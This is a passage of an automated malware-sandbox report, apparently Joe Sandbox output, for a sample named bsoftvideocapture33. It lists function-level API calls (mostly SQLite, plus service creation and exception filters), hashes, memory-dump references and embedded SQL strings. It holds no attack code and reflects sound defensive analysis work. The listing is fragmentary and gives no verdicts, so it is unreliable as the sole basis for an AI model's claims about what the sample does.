                                                                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6093F8CD
                                                                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6093F8E3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcmpsqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4038589952-0
                                                                                                                                        • Opcode ID: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                                                                        • Instruction ID: 916146ddc5613ce70bfe97dc7fabc38680eb49f4f4fdba01105907ea2da9c682
                                                                                                                                        • Opcode Fuzzy Hash: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                                                                        • Instruction Fuzzy Hash: 87F13674A046158FDB18CFA9C590A9EB7F7AFA8308F248429E846AB355D774EC42CF40
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                                                                          • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                                                                          • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                                                                        • sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                                                                          • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                                                                        • sqlite3_column_int.SQLITE3 ref: 6096A3F3
                                                                                                                                        • sqlite3_step.SQLITE3 ref: 6096A435
                                                                                                                                        • sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 247099642-0
                                                                                                                                        • Opcode ID: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                                                                        • Instruction ID: 69535c0605dcb565d56369453fd68d3a3097adfd173720c6e67b3d4aca8354ad
                                                                                                                                        • Opcode Fuzzy Hash: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                                                                        • Instruction Fuzzy Hash: FF2151B0A143148BEB109FA9D88479EB7FAEF64308F00852DE89597350EBB8D845CF51
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                                                                          • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                                                                          • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                                                                          • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                                                        • sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                                                                        • sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                                                                          • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                                                                                        • sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2sqlite3_resetsqlite3_stepsqlite3_value_int
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 326482775-0
                                                                                                                                        • Opcode ID: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                                                                        • Instruction ID: 7c1586c82cd56d85cf32929a5cd575737867df940847ca2bf63216634e784e33
                                                                                                                                        • Opcode Fuzzy Hash: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                                                                        • Instruction Fuzzy Hash: 0E214DB0A043049BDB04DFA9C480B9EF7FAEFA8354F04C429E8959B340E778D8418B51
                                                                                                                                        APIs
                                                                                                                                        • StartServiceCtrlDispatcherA.ADVAPI32 ref: 004016E7
                                                                                                                                        • GlobalFree.KERNEL32 ref: 0040236F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CtrlDispatcherFreeGlobalServiceStart
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1891229664-0
                                                                                                                                        • Opcode ID: 550c562da426c1c888ad843c529e4c4579e7184f145ef461e9d09cec15243031
                                                                                                                                        • Instruction ID: 00bc5bf7112d85f120a1d40c9f54d67d0a31ab707939e1e351a32f56e15be825
                                                                                                                                        • Opcode Fuzzy Hash: 550c562da426c1c888ad843c529e4c4579e7184f145ef461e9d09cec15243031
                                                                                                                                        • Instruction Fuzzy Hash: 6E014C2080E3C2DBC3118B745E585657FA46E1B32072D4AB7C4D26B2E7CA7D855AE70E
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6090C1EA
                                                                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6090C22F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1477753154-0
                                                                                                                                        • Opcode ID: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                                                                        • Instruction ID: fc120f7ed3300d8301d0f99cb769197b575d5683181bd6b289e4b53452841bc5
                                                                                                                                        • Opcode Fuzzy Hash: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                                                                        • Instruction Fuzzy Hash: 6501F4715042548BDB449F2EC4C576EBBEAEF65318F048469DD419B326D374D882CBA1
                                                                                                                                        APIs
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02C13B06,?,?,?,00000001), ref: 02C180ED
                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02C180F6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                        • Opcode ID: bad954e302e55f17047b581a021a767edb5d815fca026d4a9b77fdfce3b93a67
                                                                                                                                        • Instruction ID: 38c11ec488bd4053f062179efbb8f32c098897769b98b1081360f62d9d6dbb3f
                                                                                                                                        • Opcode Fuzzy Hash: bad954e302e55f17047b581a021a767edb5d815fca026d4a9b77fdfce3b93a67
                                                                                                                                        • Instruction Fuzzy Hash: 33B092315A4208ABCB242B95EC19F6A3F28FB046D2FC58910FA0E44050CF6255249AD2
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 60925508
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1465156292-0
                                                                                                                                        • Opcode ID: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                                                                        • Instruction ID: ad89f0bb34aa7175efe61e1ac22fb0c12735e6005c3b9edbf096fd229bca234b
                                                                                                                                        • Opcode Fuzzy Hash: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                                                                        • Instruction Fuzzy Hash: 5A01A475B107148BCB109F2ACC8164BBBFAEF68254F05991AEC41DB315D775ED458BC0
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 02C0E874
                                                                                                                                          • Part of subcall function 02C0E6FB: _memmove.LIBCMT ref: 02C0E7B9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3555123492-0
                                                                                                                                        • Opcode ID: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                                                                        • Instruction ID: d19b3fcc41b31507d1795b1b84729e4a541cab6997c8a3f12941a060d30a3476
                                                                                                                                        • Opcode Fuzzy Hash: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                                                                        • Instruction Fuzzy Hash: BDF082B1A0430DAAD700DF99DA42B8DFBB8EF45314F208169D508A7381E6B07A119B90
                                                                                                                                        APIs
                                                                                                                                        • CreateServiceA.ADVAPI32(?,?,?,000F01FF,00000010,00000002), ref: 0040207A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateService
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1592570254-0
                                                                                                                                        • Opcode ID: f80f7903c0be7a3f178fc0d7622642d1a9ee5044606cf3d630df099f0dcd5082
                                                                                                                                        • Instruction ID: 310a047740173106309b6a2319da314c8f3c368b40f4669d0c1c87edd9907256
                                                                                                                                        • Opcode Fuzzy Hash: f80f7903c0be7a3f178fc0d7622642d1a9ee5044606cf3d630df099f0dcd5082
                                                                                                                                        • Instruction Fuzzy Hash: FAE0C23080DB52E7C7249B208A890A07375EB113123306A3BC046B15A1D639980AF79E
                                                                                                                                        APIs
                                                                                                                                        • CreateServiceA.ADVAPI32(?,?,?,000F01FF,00000010,00000002), ref: 0040207A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateService
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1592570254-0
                                                                                                                                        • Opcode ID: cfe02039a9a84db5f86410d188af12abebcfc0bd02daddbebc60cb304302cfd2
                                                                                                                                        • Instruction ID: 38fa3e06c28acfd92a333e7822ffd917904a734e0d2a3d7f7aa9cc935173cef1
                                                                                                                                        • Opcode Fuzzy Hash: cfe02039a9a84db5f86410d188af12abebcfc0bd02daddbebc60cb304302cfd2
                                                                                                                                        • Instruction Fuzzy Hash: 84C04C74684705EAD6221B205F6DF3639686783B01F314539E202B60E2C6BC9405E57D
                                                                                                                                        APIs
                                                                                                                                        • CreateServiceA.ADVAPI32(?,?,?,000F01FF,00000010,00000002), ref: 0040207A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateService
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1592570254-0
                                                                                                                                        • Opcode ID: c09a322d87fa72ef58529a85f43b8958e74579ecb0b9be8d290a82a42f31f8cf
                                                                                                                                        • Instruction ID: 4e41bd66b8b4aa00145311ec69c476897b383b907afe9d76859391aef52cc5c1
                                                                                                                                        • Opcode Fuzzy Hash: c09a322d87fa72ef58529a85f43b8958e74579ecb0b9be8d290a82a42f31f8cf
                                                                                                                                        • Instruction Fuzzy Hash: 76C04C647CC309F5E62006210F5EF2625196781B01E70443B7352B94E189F8C486F17B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                                                                                        • Instruction ID: aa639d4c52eda77921d109c173628d401b16d57fa3137d2b917a91732d8775c8
                                                                                                                                        • Opcode Fuzzy Hash: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                                                                                        • Instruction Fuzzy Hash: D7C01265704208574B00E92DE8C154577AA9718164B108039E80B87301D975ED084291
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_initialize.SQLITE3 ref: 6096C5BE
                                                                                                                                          • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                                                                        • sqlite3_log.SQLITE3 ref: 6096C5FC
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 6096C67E
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 6096CD71
                                                                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6096CD80
                                                                                                                                        • sqlite3_errcode.SQLITE3 ref: 6096CD88
                                                                                                                                        • sqlite3_close.SQLITE3 ref: 6096CD97
                                                                                                                                        • sqlite3_create_function.SQLITE3 ref: 6096CDF8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_free$sqlite3_closesqlite3_create_functionsqlite3_errcodesqlite3_initializesqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                                                        • String ID: BINARY$NOCASE$RTRIM$porter$rtree$rtree_i32$simple
                                                                                                                                        • API String ID: 1320758876-2501389569
                                                                                                                                        • Opcode ID: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                                                                                                        • Instruction ID: 66f98c4e8467cc0752991b2fada45a5d6d89a43a55ba94f1559c09c68fc79e30
                                                                                                                                        • Opcode Fuzzy Hash: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                                                                                                        • Instruction Fuzzy Hash: 7A024BB05183019BEB119F64C49536ABFF6BFA1348F11882DE8959F386D7B9C845CF82
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 609264C9
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 60926526
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 6092652E
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 60926550
                                                                                                                                          • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                                                          • Part of subcall function 6090AFF5: sqlite3_free.SQLITE3 ref: 6090B09A
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 60926626
                                                                                                                                        • sqlite3_win32_mbcs_to_utf8.SQLITE3 ref: 6092662E
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 60926638
                                                                                                                                        • sqlite3_snprintf.SQLITE3 ref: 6092666B
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 60926673
                                                                                                                                        • sqlite3_snprintf.SQLITE3 ref: 609266B8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_mbcs_to_utf8
                                                                                                                                        • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                                                                                        • API String ID: 937752868-2111127023
                                                                                                                                        • Opcode ID: 76700054f020c8d7fe753577c30eef17e659d67ca67044e42639e839992701d7
                                                                                                                                        • Instruction ID: 28f04709130b2e8b140c84fcd32bad5e17fba194e1ccee1aab8ced89c5ccf9cf
                                                                                                                                        • Opcode Fuzzy Hash: 76700054f020c8d7fe753577c30eef17e659d67ca67044e42639e839992701d7
                                                                                                                                        • Instruction Fuzzy Hash: EA712E706183058FE700AF69D88465DBFF6AFA5748F00C82DE8999B314E778C845DF92
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        • SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' , xrefs: 60948748
                                                                                                                                        • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 60948728
                                                                                                                                        • ATTACH ':memory:' AS vacuum_db;, xrefs: 60948534
                                                                                                                                        • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';, xrefs: 60948768
                                                                                                                                        • SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %', xrefs: 60948708
                                                                                                                                        • INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0), xrefs: 60948788
                                                                                                                                        • ATTACH '' AS vacuum_db;, xrefs: 60948529
                                                                                                                                        • SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 609486C8
                                                                                                                                        • SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' , xrefs: 609486E8
                                                                                                                                        • PRAGMA vacuum_db.synchronous=OFF, xrefs: 609485BB
                                                                                                                                        • BEGIN;, xrefs: 609485DB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_log
